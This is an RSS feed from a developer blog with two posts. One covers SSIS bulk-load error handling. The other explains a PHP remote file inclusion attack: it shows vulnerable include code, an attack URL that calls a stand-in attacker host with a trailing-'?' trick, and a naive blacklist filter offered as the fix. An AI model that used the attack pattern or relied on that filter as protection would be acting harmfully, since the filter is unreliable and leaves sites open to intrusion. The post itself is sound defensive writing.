<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Intermz.com / the blog &#187; Development Tips</title>
	<atom:link href="http://www.intermz.com/blog/category/development-tips/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.intermz.com/blog</link>
	<description>The Intermz.com blog about learning, doing, and everything in between.</description>
	<pubDate>Tue, 06 Jan 2009 16:25:31 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.3</generator>
	<language>en</language>
			<item>
		<title>SSIS: Solving Load Performance vs. Row-Level Error Handling</title>
		<link>http://www.intermz.com/blog/2008/04/08/ssis-solving-load-performance-vs-row-level-error-handling/</link>
		<comments>http://www.intermz.com/blog/2008/04/08/ssis-solving-load-performance-vs-row-level-error-handling/#comments</comments>
		<pubDate>Wed, 09 Apr 2008 01:30:04 +0000</pubDate>
		<dc:creator>Ted Pin</dc:creator>
		
		<category><![CDATA[Development Tips]]></category>

		<category><![CDATA[Error handling]]></category>

		<category><![CDATA[Integration Services]]></category>

		<category><![CDATA[OLE DB]]></category>

		<category><![CDATA[Performance]]></category>

		<category><![CDATA[SSIS]]></category>

		<guid isPermaLink="false">http://www.intermz.com/blog/2008/04/08/ssis-solving-load-performance-vs-row-level-error-handling/</guid>
		<description><![CDATA[I&#8217;ve been working with SSIS a lot and ran to a brick wall recently that involved the seeming conflict between load performance and handling l0ad-rejected rows on a row-by-row basis. Fortunately, I was able to design a solution for it and hopefully my experience can help you. Here is the situation I encountered:
I had a [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve been working with SSIS a lot and ran to a brick wall recently that involved the seeming conflict between load performance and handling l0ad-rejected rows on a row-by-row basis. Fortunately, I was able to design a solution for it and hopefully my experience can help you. Here is the situation I encountered:</p>
<p align="left">I had a number of packages that each loads a SS2005 table from a  (different) flat file. Part of the architecture for the system these  packages belong to have a data quality exception process that logs each and  every row that fails insertion (which subsequently triggers a report of the  error).</p>
<p align="left">An OLD DB Destination component handled the record insertions,  which allowed me to redirect failing rows to an error file (instead of a SQL  Server Destination, which does not).</p>
<p align="left">So here is where the problem occurred. To make the OLE DB  Destination perform at all efficiently, you usually set the data access mode to  &#8220;fast load,&#8221; and set rows-per-batch and max-insert-commit-size parameters  appropriately - which usually means numbers in the hundreds to the thousands  range, depending on record width, etc.</p>
<p align="left">That provides quick loading but poses a problem if you want to send single rejected rows  to an error file because  if a row fails, the entire batch it belongs to, say a 500  record batch, are all rolled back and sent to the error file. This means that in  your error file you get 1 erroneous file and 499 <em>valid</em> records, which  is obviously not what you want.</p>
<p align="left">The obvious fix for this would be to set max insert commit to 1  (which means that batches of 1 record are committed at once) so that only  the rejected rows get sent to the error file. But, of course, this creates a  huge performance problem if you have large record sets (i.e., 100,000  rows); it can be nightmarishly slow.</p>
<p align="left">Here&#8217;s how I solved the problem and maintained performance and  single-row error handling. It&#8217;s really simple actually:</p>
<p align="left">Create two stages of OLE DB Destination insertion. The first one  is for performance and the second one is for row-level control. How does this  work?</p>
<p align="left">Send your rows to the first OLE DB Dest called &#8220;Attempt  1&#8243; and set the max commit to something with good performance (500 rows  or something). I set the batch to some multiple of that, like 1000.</p>
<p align="left">Create a second OLE DB Dest called &#8220;Attempt 2&#8243;, and set the max  commit to 1 and a batch equal to the max commit of Attempt 1. Then redirect all  the error rows from Attempt 1 to Attempt 2. Route the error rows from Attempt 2  to your error file.</p>
<p align="left">Source &gt;&gt; Transforms &gt;&gt; Attemp 1 &gt;&gt; Attempt 2  &gt;&gt; Error file (or other)</p>
<p align="left">This works because: Assuming there are more valid rows in your  source than invalid rows, your Attempt 1 will commit everything it can in large  batches, which will perform very well. Say you have 100,000 records, committing  at 500 at a time, you&#8217;re only doing 200 commits. Now, when an erroneous row is  encountered, the 500 rows are sent to Attempt 2 - which commits one at a time,  committing all of the valid rows in that batch, and redirecting the few invalid  records. Let&#8217;s say you have 5 invalid rows in 5 different batches,  then you&#8217;d send 5 * 500 = 2,500 rows to be committed one at a time -  instead of 100,000.</p>
<p align="left">To give you an idea of the kind performance improvement you can  get using this method (versus committing all rows one at a time with a single  OLE DB Destination), loading 1.6M rows with two attempts took 6.5 minutes,  whereas committing one at a time took 3.5 HOURS. The two-attempt method is  orders of magnitude faster and still allows me to capture errors on a row-by-row  basis.</p>
<p align="left">Happy plumbing!</p>
<p><script type="text/javascript">
  addthis_url    = 'http%3A%2F%2Fwww.intermz.com%2Fblog%2F2008%2F04%2F08%2Fssis-solving-load-performance-vs-row-level-error-handling%2F';
  addthis_title  = 'SSIS%3A+Solving+Load+Performance+vs.+Row-Level+Error+Handling';
  addthis_pub    = '';
</script><script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12" ></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.intermz.com/blog/2008/04/08/ssis-solving-load-performance-vs-row-level-error-handling/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Preventing URL Injection Attacks</title>
		<link>http://www.intermz.com/blog/2007/10/20/preventing-url-injection-attacks/</link>
		<comments>http://www.intermz.com/blog/2007/10/20/preventing-url-injection-attacks/#comments</comments>
		<pubDate>Sat, 20 Oct 2007 16:02:59 +0000</pubDate>
		<dc:creator>Ted Pin</dc:creator>
		
		<category><![CDATA[Development Tips]]></category>

		<guid isPermaLink="false">http://intermz.com/blog/?p=9</guid>
		<description><![CDATA[Although I was supremely irritated that someone was hacking intermz and uploading malicious files (i.e. eBay phishing files, etc) to the server, I have to give those hackers credit for the effectiveness and simplicity of their hack, what I will call a &#8220;URL injection&#8221; attack. (This differs from a SQL injection attack, which is another [...]]]></description>
			<content:encoded><![CDATA[<p>Although I was supremely irritated that someone was hacking intermz and uploading malicious files (i.e. eBay phishing files, etc) to the server, I have to give those hackers credit for the effectiveness and simplicity of their hack, what I will call a &#8220;URL injection&#8221; attack. (This differs from a SQL injection attack, which is another problem you should worry about. There is lots of good info on preventing SQL injection <a href="http://fi.php.net/pdo-prepare">out there</a>.) I am going to document how they did it here to hopefully help you web developers out there prevent this from happening to you.</p>
<p>First, let me briefly describe how the intermz site works. It follows a very simple &#8220;template/content&#8221; paradigm. Basically, I designed a single frame (template) that I load all other pages into (content) so that every page looks the same and if I need to make a change, I can just make it to the template and every page will reflect that change. I used a basic &#8220;page&#8221; parameter in my GET string to pass the name of the of .php file to load into the template. It works like this:</p>
<p>Example URL:</p>
<p><strong>http://www.intermz.com/default.php?page=home</strong></p>
<p>The PHP code takes the &#8220;page&#8221; parameter and:</p>
<p><strong>$page = $_GET['page'];</strong><br />
<strong>Require($page . &#8216;.php&#8217;);</strong></p>
<p>The jist of what the hackers did was they passed in a page parameter that was the URL of a PHP script of their own:</p>
<p><strong>http://www.intermz.com/default.php?page=<em>http://www.hackerserver123.com/maliciousCode.php?</em></strong></p>
<p>(Note: I&#8217;ve replaced the actual hack-script URL with a dummy URL so no one will go out there and try to use it.)</p>
<p>What this allows them to do is run their script on my server, letting them upload and delete files on it without needing FTP access. (See screen shot below of what that looks like.) If you are a coder, you might have noticed that the <strong>Require() </strong>command above actually appends a &#8220;.php&#8221; to whatever page is passed in and that would have tried to load &#8220;&#8230;<strong><em>maliciousCode.php.php&#8221;</em></strong> which would have failed. But if you look closely, you will notice that the injected URL ends with a &#8220;<em><strong>?</strong></em>&#8220;. This is the very clever part. That means the &#8220;.php&#8221; that my <strong>Require() </strong>command appends to the URL will actually append as a perfectly legal (although unused) <em>parameter</em>.</p>
<p>So how do you stop this kind of attack?</p>
<p>Well, I built a filter to remove any part of the page parameter that might make it an outside URL:</p>
<p><strong>$filter = array(&#8217;http://&#8217;, &#8216;www&#8217;, &#8216;.&#8217;);<br />
$replace = array(&#8221;);<br />
$page = str_ireplace($filter, $replace, $_GET['page']); </strong></p>
<p>So far, this has stopped the hacks.</p>
<p>Hope this helps you guys!</p>
<p><a href="http://intermz.com/blog/wp-content/uploads/2007/10/hack_screenshot.png" title="PHP Hack Screenshot"><img src="http://intermz.com/blog/wp-content/uploads/2007/10/hack_screenshot.png" alt="PHP Hack Screenshot" /></a></p>
<p><script type="text/javascript">
  addthis_url    = 'http%3A%2F%2Fwww.intermz.com%2Fblog%2F2007%2F10%2F20%2Fpreventing-url-injection-attacks%2F';
  addthis_title  = 'Preventing+URL+Injection+Attacks';
  addthis_pub    = '';
</script><script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12" ></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.intermz.com/blog/2007/10/20/preventing-url-injection-attacks/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>

<!-- Dynamic Page Served (once) in 0.573 seconds -->
